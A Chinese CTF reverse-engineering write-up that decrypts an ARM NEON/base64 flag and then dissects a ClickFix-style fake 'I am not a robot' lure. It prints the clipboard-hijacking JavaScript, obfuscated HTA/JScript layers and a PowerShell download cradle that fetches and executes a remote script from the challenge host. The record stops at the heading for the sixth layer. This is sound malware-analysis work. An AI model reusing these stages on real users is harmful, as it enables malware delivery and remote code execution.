LilCTF REwp+复现

w1n9 Lv1

ARM_ASM

这是主要的逻辑

image-20250822112547927

加密函数为 check,解包 APK 得到 native 的 .so 文件后用 IDA 查看——加密逻辑不在 Java 层,而在这个 so 里

image-20250822112640797

加密逻辑为:NEON 指令(以 16 字节为一组的异或 + 字节置换)→ 位运算(以 3 字节为一组的循环移位)→ base64。这里的 base64 是变表:码表是自定义的(见下方 exp 里的 VARIANT_B64_CHARS,小写字母在前、大写在后、数字顺序也被打乱了),解密时按相反的顺序逐层还原即可。

exp如下:

import base64
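# Custom base64 alphabet recovered from the .so: lowercase first, then uppercase,
# then a scrambled digit order, then "+/".  Only the symbol table differs from
# RFC 4648; the 6-bit packing is the standard one.
VARIANT_B64_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3456780129+/"
VARIANT_B64_MAP = {c: i for i, c in enumerate(VARIANT_B64_CHARS)}


def variant_b64_decode(data: str) -> bytes:
    """Decode *data* with the challenge's custom base64 alphabet.

    Four 6-bit symbols become three bytes exactly as in ordinary base64; a
    trailing group of two or three symbols yields one or two bytes.  Any
    ``=`` padding is stripped first, so padded and unpadded input both work.

    Args:
        data: the base64 text (the challenge ciphertext is 64 symbols).

    Returns:
        The decoded bytes; ``b""`` for empty input.

    Raises:
        ValueError: if a symbol is outside the alphabet, or if the length is
            one that no base64 encoder produces (``len % 4 == 1``).  The
            unchecked version leaked a KeyError / IndexError for those cases.
    """
    data = data.rstrip("=")
    try:
        sextets = [VARIANT_B64_MAP[c] for c in data]
    except KeyError as err:
        raise ValueError(f"invalid variant-base64 symbol {err.args[0]!r}") from None
    if len(sextets) % 4 == 1:
        # A single leftover symbol carries only 6 bits: not a whole byte.
        raise ValueError("invalid variant-base64 length")

    out = bytearray()
    for i in range(0, len(sextets), 4):
        group = sextets[i : i + 4]
        b1, b2 = group[0], group[1]
        out.append((b1 << 2) | (b2 >> 4))
        if len(group) > 2:
            b3 = group[2]
            out.append(((b2 & 0x0F) << 4) | (b3 >> 2))
            if len(group) > 3:
                out.append(((b3 & 0x03) << 6) | group[3])
    return bytes(out)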

def reverse_bit_shift(data: bytes) -> bytes:
    """Undo the per-triplet bit rotation applied after the NEON stage.

    For each group of three bytes the first byte is rotated left by 5 bits,
    the second rotated left by 1 bit and the third is copied untouched.
    Input whose length is not a multiple of 3 is returned unchanged (the
    caller always feeds the 48 bytes produced by the base64 stage).
    """
    if len(data) % 3:
        return data

    def rol8(value: int, bits: int) -> int:
        # 8-bit rotate left; the mask keeps the result inside one byte.
        return ((value << bits) | (value >> (8 - bits))) & 0xFF

    out = bytearray()
    for first, second, third in zip(data[0::3], data[1::3], data[2::3]):
        out += bytes((rol8(first, 5), rol8(second, 1), third))
    return bytes(out)

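def reverse_neon_xor(data: bytes, blocks: int = 3) -> bytes:
    """Invert the NEON stage: per 16-byte block, a byte permutation driven by
    a key table followed by an XOR with that same table.

    The table starts as a fixed permutation of 0..15 and is XORed with the
    block index after every block (so block 0 leaves it unchanged, block 1
    flips bit 0, ...).  Because it stays a permutation for the block counts
    used here, inverting is a plain scatter:
    ``original[table[j]] = final[j] ^ table[j]``.

    Args:
        data: the concatenated 16-byte output blocks.  Bytes past
            ``blocks * 16`` are ignored; a short last block only fills the
            positions it has data for (the rest stay 0) instead of raising.
        blocks: number of 16-byte blocks to process.  Defaults to 3, i.e. the
            48 bytes the challenge's 64-symbol base64 decodes to.

    Returns:
        ``blocks * 16`` bytes of recovered plaintext.
    """
    table = bytearray([0x0D, 0x0E, 0x0F, 0x0C, 0x0B, 0x0A, 0x09, 0x08,
                       0x06, 0x07, 0x05, 0x04, 0x02, 0x03, 0x01, 0x00])
    out = bytearray()
    for block_index in range(blocks):
        final_block = data[block_index * 16 : (block_index + 1) * 16]
        original = bytearray(16)
        for c, k in zip(final_block, table):
            # Table entries exceed 15 only once block_index >= 16; such
            # positions have no target slot and are skipped, as before.
            if k < 16:
                original[k] = c ^ k
        out += original
        # Key schedule: the table for the next block is this one XOR the
        # current block index.
        table = bytearray(k ^ block_index for k in table)
    return bytes(out)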

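if __name__ == "__main__":
    # 64-symbol variant-base64 string taken from the app; decodes to 48 bytes,
    # which is exactly three NEON blocks.
    ciphertext = "KRD2c1XRSJL9e0fqCIbiyJrHW1bu0ZnTYJvYw1DM2RzPK1XIQJnN2ZfRMY4So09S"

    try:
        # Undo the three stages in reverse order: base64 -> bit rotation -> NEON.
        decoded_data = variant_b64_decode(ciphertext)
        shifted_data = reverse_bit_shift(decoded_data)
        final_result_bytes = reverse_neon_xor(shifted_data)
        flag_content = final_result_bytes.decode("ascii")
    # Only the errors the pipeline itself can produce (bad symbol / length,
    # non-ASCII result); anything else is a bug and should keep its traceback
    # instead of being swallowed by a catch-all.
    except (KeyError, IndexError, ValueError) as e:
        print(f"解密过程中发生错误: {e}")
    else:
        print(flag_content)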

# LILCTF{ez_arm_asm_meow_meow_meow_meow_meow_meow}

1’M no7 A rO6oT

这是页面部分源代码

const cmd =
"powershell . \\\\*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\\\\msh*e ###HOST###/Coloringoutomic_Host.mp3 ###HOST###/Coloringoutomic_Host.mp3 # ✅ Ι am nοt a rοbοt: CAPTCHA Verification ID: 10086";
// Origin of the page serving the lure. It is substituted for ###HOST### in `cmd`, so the
// mshta stage fetches the ".mp3" (really an HTA, see below) from whichever host is
// currently hosting this page.
const baseUrl = `${window.location.protocol}//${window.location.host}`;

// Beacon: POSTs the page's own origin to /whereami as soon as the page loads, before any
// user interaction. A failed request is only logged so a blocked beacon does not break the lure.
fetch("/whereami", {
method: "POST",
body: baseUrl,
}).catch((err) => {
console.error("Failed to report host:", err);
});

// Click handler of the fake "I am not a robot" checkbox (ClickFix-style lure). The page
// itself executes nothing: it swaps the checkbox for a spinner and, one second later,
// silently copies the PowerShell one-liner into the clipboard through an invisible
// textarea + execCommand("copy"), then reveals "verification steps" that presumably
// instruct the victim to paste and run it.
function showVerification() {
const checkbox = document.querySelector(".recaptcha-checkbox");
const loadImg = document.querySelector(".loadImg");

// Hide the checkbox and show spinner
checkbox.style.display = "none";
loadImg.style.display = "block";

setTimeout(() => {
document.getElementById("verificationSteps").style.display = "block";
// Off-screen, fully transparent textarea holding `cmd` with the live origin patched in.
let ta = document.createElement("textarea");
ta.value = cmd.replaceAll("###HOST###", baseUrl);
ta.style.position = "fixed";
ta.style.opacity = 0;
ta.style.top = "-9999px";
document.body.appendChild(ta);
ta.focus();
ta.select();
// Clipboard write typically requires a user gesture; the checkbox click just supplied one.
document.execCommand("copy");
ta.remove();
}, 1000);
}

主要逻辑就是一个伪造的人机验证(俗称 ClickFix 的手法):页面加载时先向 /whereami 回传自己的 host,点击“验证”后再把一段 PowerShell 命令悄悄复制到剪贴板——页面本身并不能执行任何东西,全靠受害者按页面提示把剪贴板内容粘贴到运行框/终端里执行。命令执行后电脑会在十分钟后强制关机,主要通过那个 mp3 文件实现的(它其实不是音频,见下文)。

通过命令(注意命令里的 `\\*i*\\...\\*2\\msh*e` 是用通配符拼出来的路径,故意不出现 mshta 这个字符串;Get-Command 会把它解析成实际的可执行文件)

Get-Command \\*i*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*2\\\\msh*e

得到输出

image-20250822112946936

以及结合 010 下观察到 MP3 文件中的 HTA 标签可以得知,这个“MP3”其实是一个 HTA 文件:mshta.exe 并不看扩展名,直接解析其中的 HTML/脚本标签。mshta.exe 是微软签名、系统自带的程序(典型的 LOLBin),这里用它来绕过基于路径/签名的应用程序白名单,从而执行 HTA 里的内容。因为 HTA 里可以写 VBScript/JavaScript,所以 010 里那段 JS 代码自然就是主要的内容。

接下来就是几层混淆嵌套

第一层

window.resizeTo(0, 0);
window.moveTo(-9999, -9999);
SK=102;UP=117;tV=110;Fx=99;nI=116;pV=105;wt=111;RV=32;wV=82;Rp=106;kz=81;CX=78;GH=40;PS=70;YO=86;kF=75;PO=113;QF=41;sZ=123;nd=118;Ge=97;sV=114;wl=104;NL=121;Ep=76;uS=98;Lj=103;ST=61;Ix=34;Im=59;Gm=101;YZ=109;Xj=71;Fi=48;dL=60;cX=46;ho=108;jF=43;Gg=100;aV=90;uD=67;Nj=83;US=91;tg=93;vx=45;xv=54;QB=49;WT=125;FT=55;yN=51;ff=44;it=50;NW=53;kX=57;zN=52;Mb=56;Wn=119;sC=65;Yp=88;FF=79;

var SxhM = String.fromCharCode(SK,UP,tV,Fx,nI,pV,wt,tV,RV,pV,wt,wV,Rp,kz,CX,GH,PS,YO,kF,PO,QF,sZ,nd,Ge,sV,RV,wt,wl,NL,Ep,uS,Lj,ST,RV,Ix,Ix,Im,SK,wt,sV,RV,GH,nd,Ge,sV,RV,Gm,YZ,Xj,kF,RV,ST,RV,Fi,Im,Gm,YZ,Xj,kF,RV,dL,RV,PS,YO,kF,PO,cX,ho,Gm,tV,Lj,nI,wl,Im,RV,Gm,YZ,Xj,kF,jF,jF,QF,sZ,nd,Ge,sV,RV,tV,Gg,aV,uD,RV,ST,RV,Nj,nI,sV,pV,tV,Lj,cX,SK,sV,wt,YZ,uD,wl,Ge,sV,uD,wt,Gg,Gm,GH,PS,YO,kF,PO,US,Gm,YZ,Xj,kF,tg,RV,vx,RV,xv,Fi,QB,QF,Im,wt,wl,NL,Ep,uS,Lj,RV,ST,RV,wt,wl,NL,Ep,uS,Lj,RV,jF,RV,tV,Gg,aV,uD,WT,sV,Gm,nI,UP,sV,tV,RV,wt,wl,NL,Ep,uS,Lj,WT,Im,nd,Ge,sV,RV,wt,wl,NL,Ep,uS,Lj,RV,ST,RV,pV,wt,wV,Rp,kz,CX,GH,US,FT,QB,yN,ff,RV,FT,QB,it,ff,RV,FT,it,Fi,ff,RV,FT,Fi,it,ff,RV,FT,QB,NW,ff,RV,FT,QB,xv,ff,RV,FT,Fi,NW,ff,RV,FT,Fi,it,ff,RV,FT,Fi,kX,ff,RV,FT,Fi,kX,ff,RV,xv,zN,FT,ff,RV,FT,Fi,it,ff,RV,FT,it,QB,ff,RV,FT,Fi,it,ff,RV,xv,yN,yN,ff,RV,xv,zN,xv,ff,RV,FT,it,Fi,ff,RV,xv,yN,yN,ff,RV,xv,NW,Fi,ff,RV,xv,yN,yN,ff,RV,xv,zN,xv,ff,RV,FT,Fi,it,ff,RV,FT,QB,yN,ff,RV,xv
,yN,yN,ff,RV,xv,Mb,xv,ff,RV,FT,QB,QB,ff,RV,FT,QB,NW,ff,RV,FT,
Fi,it,ff,RV,FT,QB,xv,ff,RV,FT,QB,FT,ff,RV,FT,QB,NW,ff,RV,FT,
Fi,xv,ff,RV,FT,Fi,Fi,ff,RV,FT......)
eval(SxhM);
window.close();
# 将 eval 替换为 console.log(只打印、不执行),删掉 window.close,然后在浏览器控制台运行;开头的 resizeTo(0,0)/moveTo(-9999,-9999) 只是把 mshta 窗口缩到 0 并挪到屏幕外以隐藏自己,可一并删掉

第二层

// Layer-2 decoder: every element of FVKq is a character code offset by +601.
// Subtracting the constant and concatenating rebuilds the hidden string; it is used
// below both for the PowerShell command line and for the "WScript.Shell" ProgID.
function ioRjQN(FVKq)
{
var ohyLbg= "";
for (var emGK = 0;emGK < FVKq.length; emGK++){
var ndZC = String.fromCharCode(FVKq[emGK] - 601);
ohyLbg = ohyLbg + ndZC
}
return ohyLbg
};
var ohyLbg = ioRjQN([713, 712, 720, 702, 715, 716, 705, 702, 709, 709, 647, 702, 721, 702, 633, 646, 720, 633, 650, 633, 646, 702, 713, 633, 686, 711, 715, 702, 716, 717, 715, 706, 700, 717, 702, 701, 633, 646, 711, 712, 713, 633, 637, 670, 671, 685, 670, 633, 662, 641, 692, 715, 702, 704, 702, 721, 694, 659, 659, 678, 698, 717, 700, 705, 702, 716, 641, 640, 698, 654, 698, 658, 699, 653, 658, 703, 699, 657, 698, 701, 699, 702, 699, 657, 702, 650, 658, 700, 699, 702, 698, 652, 698, 703, 698, 658, 699, 703, 699, 703, 702, 700, 702, 702, 702, 657, 698, 658, 698, 651, 699, 698, 703, 655, 658, 703, 699, 654, 699, 703, 699, 657, 698, 658, 698, 650, 658, 702, 698, 652, 698, 652, 699, 657, 658, 649, 658, 703, 699, 654, 699, 703, 658, 699, 657, 652, 658, 699, 703, 698, 703, 657, 658, 649, 658, 699, 698, 654, 698, 651, 698, 657, 698, 652, 699, 699, 699, 703, 658, 700, 698, 652, 699, 699, 698, 658, 699, 702, 658, 703, 698, 653, 698, 658, 698, 649, 698, 649, 658, 649, 699, 698, 703, 701, 702, 651, 703, 700, 658, 649, 699, 700, 698, 652, 699, 699, 698, 658, 699, 702, 699, 703, 698, 653, 698, 658, 698, 649, 698, 649, 702, 651, 698, 658, 699, 653, 698, 658, 702, 702, 702, 700, 702, 650, 658, 699, 698, 654, 698, 651, 698, 657, 698, 652, 699, 699, 658, 703, 699, 657, 699, 654, 698, 649, 698, 658, 702, 700, 657, 653, 698, 654, 698, 657, 698, 657, 698, 658, 698, 651, 702, 700, 702, 650, 657, 701, 699, 702, 698, 699, 699, 658, 698, 650, 698, 658, 698, 651, 699, 657, 657, 649, 698, 654, 699, 703, 699, 657, 702, 700, 702, 699, 702, 650, 699, 699, 702, 699, 702, 649, 702, 699, 698, 653, 702, 699, 702, 649, 702, 699, 702, 650, 698, 658, 699, 700, 702, 699, 702, 649, 702, 699, 658, 658, 698, 651, 699, 702, 698, 658, 699, 703, 699, 657, 699, 702, 698, 654, 698, 703, 699, 657, 698, 658, 698, 657, 702, 699, 702, 649, 702, 699, 702, 650, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 699, 702, 649, 702, 702, 658, 703, 698, 658, 699, 657, 702, 650, 658, 698, 698, 
701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 703, 703, 702, 700, 702, 699, 698, 653, 699, 657, 699, 657, 699, 700, 703, 655, 702, 652, 702, 652, 698, 703, 698, 653, 698, 701, 698, 649, 698, 649, 698, 658, 698, 651, 698, 699, 698, 658, 702, 651, 699, 653, 698, 654, 698, 651, 699, 703, 698, 653, 698, 654, 702, 651, 698, 698, 699, 658, 698, 651, 703, 655, 703, 657, 703, 701, 703, 700, 703, 698, 703, 657, 702, 652, 698, 702, 698, 658, 699, 703, 699, 657, 699, 658, 698, 657, 698, 657, 698, 654, 698, 651, 698, 699, 702, 651, 698, 655, 699, 700, 698, 699, 702, 699, 703, 656, 658, 703, 657, 654, 702, 700, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 703, 655, 702, 652, 658, 655, 703, 657, 657, 657, 702, 700, 702, 699, 657, 651, 698, 658, 699, 657, 702, 651, 658, 699, 698, 658, 698, 702, 657, 703, 698, 649, 698, 654, 698, 658, 698, 651, 699, 657, 702, 699, 703, 656, 698, 703, 698, 657, 703, 656, 658, 703, 658, 698, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 653, 702, 651, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 651, 702, 653, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 702, 654, 658, 656, 703, 702, 658, 650, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 
658, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 702, 651, 702, 653, 702, 653, 698, 700, 702, 657, 657, 658, 699, 653, 698, 658, 698, 703, 699, 658, 699, 657, 698, 654, 698, 652, 698, 651, 657, 703, 698, 652, 698, 651, 699, 657, 698, 658, 699, 653, 699, 657, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 657, 703, 698, 652, 698, 650, 698, 650, 698, 701, 698, 651, 698, 657, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 699, 649, 658, 699, 698, 653, 698, 658, 699, 702, 698, 658, 699, 656, 702, 653, 657, 699, 658, 698, 702, 700, 658, 652, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 650, 698, 703, 698, 649, 698, 654, 698, 656, 698, 658, 702, 699, 702, 655, 698, 657, 657, 651, 698, 701, 698, 650, 698, 658, 702, 699, 699, 650, 702, 654, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 702, 653, 702, 699, 657, 651, 698, 658, 702, 655, 698, 703, 699, 657, 702, 699, 702, 649, 703, 701, 702, 649, 703, 701, 702, 654, 702, 654, 702, 653, 657, 649, 658, 703, 702, 700, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 703, 655, 702, 652, 658, 655, 703, 657, 657, 657, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 654, 703, 656, 658, 703, 658, 698, 702, 700, 657, 701, 702, 700, 702, 653, 702, 653, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 650, 658, 
698, 698, 701, 698, 649, 699, 658, 698, 658, 657, 652, 702, 654, 699, 649, 657, 699, 698, 658, 699, 657, 702, 650, 657, 650, 698, 658, 698, 650, 698, 702, 698, 658, 699, 702, 702, 654, 699, 649, 658, 699, 698, 653, 698, 658, 699, 702, 698, 658, 699, 656, 702, 653, 657, 699, 658, 698, 702, 700, 658, 652, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 650, 698, 703, 698, 649, 698, 654, 698, 656, 698, 658, 702, 699, 702, 655, 699, 699, 698, 651, 702, 655, 698, 657, 702, 655, 698, 699, 702, 699, 699, 650, 702, 654, 702, 651, 657, 651, 698, 701, 698, 650, 698, 658, 702, 654, 703, 656, 702, 698, 702, 653, 658, 656, 658, 703, 698, 703, 699, 702, 698, 654, 699, 700, 699, 657, 657, 702, 698, 649, 698, 652, 698, 703, 698, 656, 658, 650, 703, 655, 703, 655, 657, 703, 699, 702, 698, 658, 698, 701, 699, 657, 698, 658, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 698, 703, 703, 657, 657, 653, 702, 700, 702, 650, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 657, 652, 702, 654, 702, 651, 702, 653, 702, 653, 657, 699, 698, 658, 699, 657, 702, 650, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 657, 701, 702, 654, 702, 651, 658, 698, 698, 701, 698, 649, 699, 658, 698, 658, 702, 654, 702, 651, 657, 654, 698, 651, 699, 698, 698, 652, 698, 656, 698, 658, 702, 653, 702, 653, 658, 698, 698, 701, 699, 702, 698, 654, 698, 701, 698, 702, 698, 649, 698, 658, 702, 700, 703, 703, 702, 700, 702, 650, 658, 698, 698, 701, 698, 649, 702, 654, 702, 654, 702, 654, 702, 654, 702, 702, 703, 656, 640, 645, 640, 647, 724, 651, 726, 640, 642, 633, 725, 633, 638, 633, 724, 633, 692, 700, 705, 698, 715, 694, 641, 692, 668, 712, 711, 719, 702, 715, 717, 694, 659, 659, 685, 712, 667, 722, 717, 702, 641, 637, 696, 647, 687, 698, 709, 718, 702, 645, 650, 655, 642, 633, 646, 699, 721, 
712, 715, 633, 640, 651, 649, 653, 640, 642, 633, 726, 642, 633, 646, 707, 712, 706, 711, 633, 640, 640, 660, 639, 633, 637, 670, 671, 685, 670, 647, 684, 718, 699, 716, 717, 715, 706, 711, 704, 641, 649, 645, 652, 642, 633, 637, 670, 671, 685, 670, 647, 684, 718, 699, 716, 717, 715, 706, 711, 704, 641, 652, 642]);
// [688,684,...] - 601 spells "WScript.Shell" (87 83 99 114 105 112 116 46 83 104 101 108 108).
var emGK = ioRjQN([688,684,700,715,706,713,717,647,684,705,702,709,709]);
// Only resolvable inside mshta / the Windows Script Host; a normal browser has no
// ActiveXObject and throws here. Note this rebinds the name of the decoder function above.
var ioRjQN = new ActiveXObject(emGK);
// WshShell.Run(command, windowStyle, waitOnReturn): windowStyle 0 = hidden window.
// ohyLbg decodes to the PowerShell command line (its first codes spell
// "powershell.exe -w 1 -ep U...", i.e. hidden window + unrestricted execution policy).
ioRjQN.Run(ohyLbg, 0, true);

# 同样把 `ioRjQN.Run(ohyLbg, 0, true)` 换成 `console.log(ohyLbg, emGK)` 打印两者的内容,并把 `new ActiveXObject(emGK)` 那一行一起删掉:浏览器里没有 ActiveXObject 会直接报错,而在 mshta 里它会真的创建 WScript.Shell

第三层,得到了一段pwsh代码

$EFTE =([regex]::Matches('a5a9b49fb8adbeb8e19cbea3afa9bfbfec
eee8a9a2baf69fb5bfb8a9a19ea3a3b8909fb5bf9b839bfaf8909ba5a2a8
a3bbbf9ca3bba9be9fa4a9a0a090bafde2fc90bca3bba9bebfa4a9a0a0e2
a9b4a9eeece19ba5a2a8a3bb9fb8b5a0a9ec84a5a8a8a9a2ece18dbeabb9
a1a9a2b880a5bfb8ecebe1bbebe0eba4ebe0ebe1a9bcebe0eb99a2bea9bf
b8bea5afb8a9a8ebe0ebe18fa3a1a1ada2a8ebe0ee9fa9b8e19aadbea5ad
aea0a9ecffeceba4b8b8bcf6e3e3afa4ada0a0a9a2aba9e2b4a5a2bfa4a5
e2aab9a2f6f8fdfcfaf8e3aea9bfb8b9a8a8a5a2abe2a6bcabebf79f85ec
9aadbea5adaea0a9f6e396f888eceb82a9b8e29ba9ae8fa0a5a9a2b8ebf
7afa8f79f9aecaff884ece4e2ace889b4a9afb9b8a5a3a28fa3a2b8a9b4b
8e285a2baa3a7a98fa3a1a1ada2a8e2e4e4ace889b4a9afb9b8a5a3a28fa
3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8b08ba9b8e181a9a1aea9b
ee597fe91e282ada1a9e5e285a2baa3a7a9e4ace889b4a9afb9b8a5a3a28
fa3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8e2e4e4ace889b4a9afb
9b8a5a3a28fa3a2b8a9b4b8e285a2baa3a7a98fa3a1a1ada2a8b08ba9b8e
181a9a1aea9beb09ba4a9bea9b7e48b9aec93e5e29aada0b9a9e282ada1a
9e1afa0a5a7a9ebe6a882ada1a9ebb1e5e282ada1a9e5e285a2baa3a7a9e
4eb82a9e6afb8ebe0fde0fde5e5e4809fec9aadbea5adaea0a9f6e396f88
8e5e29aada0b9a9e5f79f9aec8dece4e4e4e48ba9b8e19aadbea5adaea0a
9ecaff884ece19aada0b9a983e5b08ba9b8e181a9a1aea9bee5b09ba4a9b
ea9b7e48b9aec93e5e29aada0b9a9e282ada1a9e1afa0a5a7a9ebe6bba2e
6a8e6abebb1e5e282ada1a9e5f7eae4979fafbea5bcb88ea0a3afa791f6f
68fbea9adb8a9e4e48ba9b8e19aadbea5adaea0a9ecaff884ece19aada0b
9a983e5e2e4e48ba9b8e19aadbea5adaea0a9ec8de5e29aada0b9a9e5e28
5a2baa3a7a9e4e49aadbea5adaea0a9ecffece19aada0e5e5e5e5eef7
','.{2}') | % { [char]([Convert]::ToByte($_.Value,16) -bxor '204') }) -join '';

# `&` is the call operator: the first three characters of the decoded string become the
# command name and the remainder its argument, so this line EXECUTES the payload.
# The first three hex pairs (a5 a9 b4) XOR 0xCC are 'i','e','x', i.e. this is `iex <rest>`.
# To inspect instead, drop the `&` and just output $EFTE.
& $EFTE.Substring(0,3) $EFTE.Substring(3)

# '&' 是 PowerShell 的调用运算符:这一行会把解码后字符串的前 3 个字符当命令、其余当参数执行(前三个 hex 对 a5 a9 b4 与 0xCC 异或后正是 'iex'),把 '&' 摘掉再直接输出 $EFTE 就只会显示变量值而不执行它

第四层

# Layer 4 - the decoded download cradle. This is a listing of what was decoded, not
# something to run; in the original it is one command line (the line breaks here are the
# writeup's formatting, which is why there are no backtick continuations).
#  - Spawns the SysWOW64 (32-bit) PowerShell with a hidden window, `-ep Unrestricted`
#    (no execution-policy prompt) and an inline -Command.
#  - Builds a Net.WebClient through $ExecutionContext.InvokeCommand reflection so the
#    literal strings "New-Object" / "DownloadString" never appear: 'Ne*ct' and '*wn*d*g'
#    are wildcard member lookups, presumably resolving to New-Object and DownloadString.
#  - The text fetched from bestudding.jpg is wrapped in [ScriptBlock]::Create and invoked
#    with `&`, i.e. executed in memory without ever being written to disk.
# The angle brackets around the URL look like a markdown auto-link artifact, not part of
# the real payload.
Start-Process "$env:SystemRoot\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
-WindowStyle Hidden
-ArgumentList '-w','h','-ep','Unrestricted','-Command',"Set-Variable 3 '<http://challenge.xinshi.fun:41064/bestudding.jpg>';
SI Variable:/Z4D 'Net.WebClient';
cd;
SV c4H (.`$ExecutionContext.InvokeCommand.((`$ExecutionContext.InvokeCommand|Get-Member)[2].Name).Invoke(`$ExecutionContext.InvokeCommand.((`$ExecutionContext.InvokeCommand|Get-Member|Where{(GV _).Value.Name-clike'*dName'}).Name).Invoke('Ne*ct',1,1))(LS Variable:/Z4D).Value);
SV A ((((Get-Variable c4H -ValueO)|Get-Member)|Where{(GV _).Value.Name-clike'*wn*d*g'}).Name);
&([ScriptBlock]::Create((Get-Variable c4H -ValueO).((Get-Variable A).Value).Invoke((Variable 3 -Val))))";

这里的 jpg 并不是图片,而是题目容器里托管的远程脚本:上面这一层是一个典型的 download cradle——用 Net.WebClient 把它下载成字符串(通配符 '*wn*d*g' 取到的成员应该就是 DownloadString),然后直接 [ScriptBlock]::Create 再用 & 执行,全程不落盘。我们只需要把它下载下来看代码即可(在隔离环境里做,而且只下载、不执行):

# Fetch the second-stage script the cradle would have executed, but only print it.
# Do this from an isolated analysis VM: the host is attacker-controlled. The port here
# (36057) differs from the 41064 seen in layer 4 - presumably each challenge instance gets
# its own port, so use the one of your instance. The angle brackets around the URL look like
# a markdown auto-link artifact; strip them, otherwise the request will fail.
$url = '<http://challenge.xinshi.fun:36057/bestudding.jpg>'
$webClient = New-Object Net.WebClient
# DownloadString returns the body as text; nothing in it is invoked.
$scriptContent = $webClient.DownloadString($url)
# Echoing the variable writes the fetched source to the console.
$scriptContent
# This yields the script hidden behind the ".jpg".

第五层

('('  | % { $r = + $() } { $u = $r } { $b = ++  $r } { $q = 
( $r = $r + $b ) } { $z = ( $r = $r + $b ) } { $o = ($r
= $r + $b ) } { $d = ($r = $r + $b ) } { $h = ($r = $r +
$b ) } { $e = ($r = $r + $b ) } { $i = ($r = $r + $b )
} { $x = ($q *( $z) ) } { $l = ($r = $r + $b) } { $g = "["
+ "$(@{ })"[$e ] + "$(@{ })"[ "$b$l" ] + "$(@{ } )
"[ "$q$u" ] + "$?"[$b ] + "]" } { $r = "".("$( @{} )
"[ "$b$o" ] + "$(@{}) "[ "$b$h"] + "$( @{ } )"[$u]
+ "$(@{} )"[$o] + "$? "[ $b] + "$( @{})"[$z ]) } { $r
= "$(@{ } )"[ "$b" + "$o"] + "$(@{ }) "[$o ] + "$r"
["$q" + "$e" ] } );
"
$r ($g$z$x+$g$x$i+$g$b$u$b+$g
$l$i+$g$b$b$e+$g$b$u$z+$g$i$u+$g$b$b$o+$g$b$u$b+$g$b$u$q+
$g$b$u$b+$g$b$b$o+$g$b$u$b+$g$b$b$u+$g$l$l+$g$b$u$b+$g$z$
q+$g$x$b+$g$z$q+$g$z$x+$g$x$l+$g$b$b$o+$g$b$b$o+$g$b$b$b+
$g$b$b$o+$g$x$d+$g$l$l+$g$b$b$x+$g$b$u$d+$g$b$b$b+$g$b$b$
u+$g$i$u+$g$b$b$o+$g$b$u$b+$g$b$u$q+$g$b$u$b+$g$b$b$o+$g
$b$u$b+$g$b$b$u+$g$l$l+$g$b$u$b+$g$z$q+$g$x$b+$g$z$q+$g$z
$x+$g$i.......)
" | .$r
# 末尾的 `| .$r` 里 $r 拼接出来的正是 'iex'(把 $b..$l 的值代入 'System.Collections.Hashtable'、'True' 和 String.Insert 的签名字符串即可验证),也就是把整段字符串送给 Invoke-Expression 执行;把 .$r 替换为 Write-Output,让它只输出、继续自解密

第六层

